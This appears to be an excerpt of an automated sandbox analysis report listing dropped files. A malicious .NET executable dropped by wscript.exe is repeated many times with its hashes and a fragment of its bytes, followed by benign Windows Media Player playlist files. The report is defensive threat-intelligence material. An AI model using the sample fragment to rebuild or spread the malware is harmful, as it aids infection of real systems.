                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1272
                          Entropy (8bit):4.037947479559426
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwegG2SBZ5EkqfxI+/RWNVYAh1MsAvXC0R0NXqVSqCj7SNCjqCjhRNCj3:xtwxloG/rdAvyoCegICGgCGdKv
                          MD5:159E63275630EC4C9747B664BD063938
                          SHA1:BE4E32D7D022C3E3277E1ED65A21BEBCF787CE3F
                          SHA-256:D54745665432625A904636E7675612C85026DA07E68F4E9D8DACBE98E5DEE844
                          SHA-512:1A128D4F59424BCE6818C117F84DBFE16B7DA1543D7B2682460DA74839BFC6CFE805DA00112E17CBAAFDF4179E357B70FA0850FA722FB04F202E1D75E65EDB60
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music auto rated at 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Effective Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">5 stars</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1279
                          Entropy (8bit):4.051212913630708
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwegG2W75EkqfxI+/RWNVYAh1MsAvXzJfjzbT6qCj7SNCjqCjhRNCjqCr:xtwxlsG/rdAvDJ3dgICGgCGdKv
                          MD5:907BFC98CE854AE312127C952D8BE0F2
                          SHA1:02DEFE8C5F9CC85742E45BA55E4FCFE326FD960C
                          SHA-256:C475DC7423C2AD60F25ADAAC754CD8B68B57FF04F26ECEF78F3E5961B986A324
                          SHA-512:DB4045F992BAD6AD660769A22345C5E0D965AE521D6828D612B15F0163622C629992C313A41BC9E381F9B0F098117EEF840D33100AF4C6A3634EB0013A7FE1C7
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music added in the last month</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Acquisition Date">.. <argument name="condition">Is Later Than</argument>.. <argument name="value">Last month</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1267
                          Entropy (8bit):4.025849031008368
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwegG2bxOBZ5EkqfxI+/RWNVYAh1MsAvXMV/NXq2SqCj7SNCjqCjhRNCT:xtwxlgxDG/rdAvcVNvgICGgCGdKv
                          MD5:6D791B697AF46D6777182AF7F18C2955
                          SHA1:D73E8B5F4EE646C1C4AB6D23F3CB3394CB833CA8
                          SHA-256:4825EB90140F6B2F4F7ED0DF66B24E10FF5D0DA70AF53EA495FD30B3AA791870
                          SHA-512:268CF327A9F471D547AD1DAE47833CF6D722C08F9CBF5E7867A422282CE52DC320340DED93473A598903BFEE9BF6A1A3393779468DBEB27D3390DBD59E6D20BA
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music rated at 4 or 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="User Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">4 stars</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1284
                          Entropy (8bit):4.05476728806244
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwegG24Mp75EkqfxI+/RWNVYAh1MsAvXbbgNzbT6qCj7SNCjqCjhRNCj3:xtwxlMAG/rdAvHmdgICGgCGdKv
                          MD5:F8D3A4CACF055F5EC5C62218EA50D290
                          SHA1:974474CE3FE345D8015863BD6EA7242BA118532B
                          SHA-256:201F2170812CF8041964C4D3C5EF539D96ADEBA6A68B69ECAED0AFFE3AE8E25F
                          SHA-512:AC32CBEB05FAE672047705679043AECF9B56314BAA09C2D3ABB7EAC655710D7CB2C967EA1772767E366BB502E8AD6DE375302F51CA62A76D962EE539B45BFC21
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music played in the last month</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Last play date">.. <argument name="condition">Is More Recent Than</argument>.. <argument name="value">Last month</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument n
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):797
                          Entropy (8bit):4.313068810170943
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwe3tfUa75EkqfxI+/RWNVAiWMAAvXO7/jzbT6qCjWBX2WN8M+Vv:xtwx/5sG/4xAvAXddKv
                          MD5:821D2BE672F05514127C117CEF460C6E
                          SHA1:1C75F314E7658A3DCDCAD315E301F2BAE6D47B31
                          SHA-256:3ABDB6CBD88AD1557054ECE3F10DD1A8494ED32F423B3CF8321B18DECC489474
                          SHA-512:146D6293173B80FFE3721AE6E61293CC1D838E8A72713BE8B859CE33C69EF753408057BE9CE15A78D573E253548EE674CA3FEA77EFA3D330CE8C8A50F8A8A988
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 9.0.0.3442"/>.. <title>Pictures taken in the last month</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{CC823400-A8E4-4081-B073-D3B6D952FE69}" name="Pictures in my library">.. <fragment name="DateTimeTaken">.. <argument name="condition">Is Later Than</argument>.. <argument name="value">Last month</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>.. </body>..</smil>..
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):785
                          Entropy (8bit):4.281070989332542
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwe3tfUZOBZ5EkqfxI+/RWNVAiWMAAvXMV/NXq2SqCjWBX2WN8M+Vv:xtwx/56DG/4xAvcVNvdKv
                          MD5:0A8A40CA87323DC16893194B00C7FE77
                          SHA1:B88A42A85053E0A7483E331B66BA5A40A6290E10
                          SHA-256:9AA433BED2E090CC6904F1C24D5A7B5A1ED6D8F71A997E661B886C69383FD53E
                          SHA-512:5932F09106D622054E6D624221D754FF471E3F37D9F585ED23DB7F7327FE1E2F624B22A8F7F2827B607FDB9A30683B8F20C48A39CD35A57AD5CB78467AF2C20E
                          Malicious:false
                          Reputation:unknown
